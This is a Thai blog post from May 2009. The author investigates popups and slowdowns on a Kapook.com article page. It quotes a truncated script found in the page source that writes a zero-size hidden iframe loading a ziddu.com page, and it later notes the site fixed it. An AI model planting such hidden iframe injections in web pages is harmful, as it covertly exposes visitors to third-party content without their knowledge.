Kapook.com เป็นอะไรไป หรือเปล่า??
Friday, May 8th, 2009วันนี้เวลาประมาณ เที่ยงคืน ของวันที่ 7 พค. 52 ว่าจะเข้าไปหาอ่านอะไรใน X-File ของ Kapook.com สักหน่อย แต่มางงเอาตอนที่ผมเปิดดูเนื้อหา
http://hilight.kapook.com/view/36658
แล้วมันเกิดอาการ “เครื่องอืด” โดยเฉพาะ Browser ที่เปิดอ่านเนื้อหาหน้านั้นอยู่ และเมื่อผมลองดู Status Bar มันมีอาการวิ่งไม่หยุด



แถมรู้สึกว่ามันมีการวิ่งไปยังเว็บ ziddu.com อีกด้วย แต่ที่ร้ายกว่านั้นก็คือมันแทบจะมี popup เด้งออกมาซะตลอดเวลา ซึ่งเป็น popup ประมาณนี้


ซึ่งผมเองก็ไม่แน่ใจนะว่ามันเป็น Ad จากทาง Kapook.com จริงๆหรือเปล่า ก็เลยลองๆ View Source ดูเล่นๆ ซึ่งก็เจอโค๊ดอันนึงประมาณแบบนี้ แทรกอยู่ท้ายๆหน้าเว็บไซต์ ซึ่งในหน้าแรกผมไม่เจอนะ แต่ไปเจอในหน้าที่อ่านเนื้อหา
<script type=”text/JavaScript” language=”JavaScript”>
b=window.document;
if(popUpsBlocked){
b.write(’<iframe src=”http://www.ziddu.com/gallery/1751331/yenta4-display-0007.gif.html” mce_src=”http://www.ziddu.com/gallery/1751331/yenta4-display-0007.gif.html” width=0′+’ height=0′+’ frameborder=0″ scrolling=”no”></iframe>’);
…………………….(อีกมากมาย)
}
</script>
ซึ่งตำแหน่งของสคริปที่วางจะวางอยู่ตำแหน่งประมาณนี้

สคริปจะอยู่ด้านล่างเมนูย่อยๆด้านท้ายเว็บ แต่เมื่อดูแล้วไม่ได้มีอะไรโผล่ออกมาเลย เพราะใช้ Iframe และเมื่อผมลองเอา URL ในสคริปที่แทรกอยู่ไปลองเปิดดูก็เจอหน้าตาประมาณนี้

http://www.ziddu.com/gallery/1751331/yenta4-display-0007.gif.html
และเมื่อลอง allow popup ดูก็ปรากฏว่าโผล่ popup แบบๆเดียวกับที่ผมเปิดหน้า Kapook.com ซึ่งไม่แน่ใจว่าเป็นความตั้งใจ หรือ ต้องการทำอะไรของทาง Kapook.com หรือไม่?? แล้วเกี่ยวอะไรกับชื่อ yenta4-display-0007.gif ที่มีอยู่ในสคริปที่แทรกไว้
หรือว่าทาง Kapook.com โดนของดีอะไรเข้าไปหรือเปล่าครับ?? ก็แค่สงสัยนะ ไม่มีไร อิอิ…
ตอนนี้เวลา 7.30 น. ของวันที่ 8 พค. 52 ทาง kapook.com ได้ทำการแก้ไขเรียบร้อยแล้ว ตกลงโดนของหรือเปล่าน๊า….



















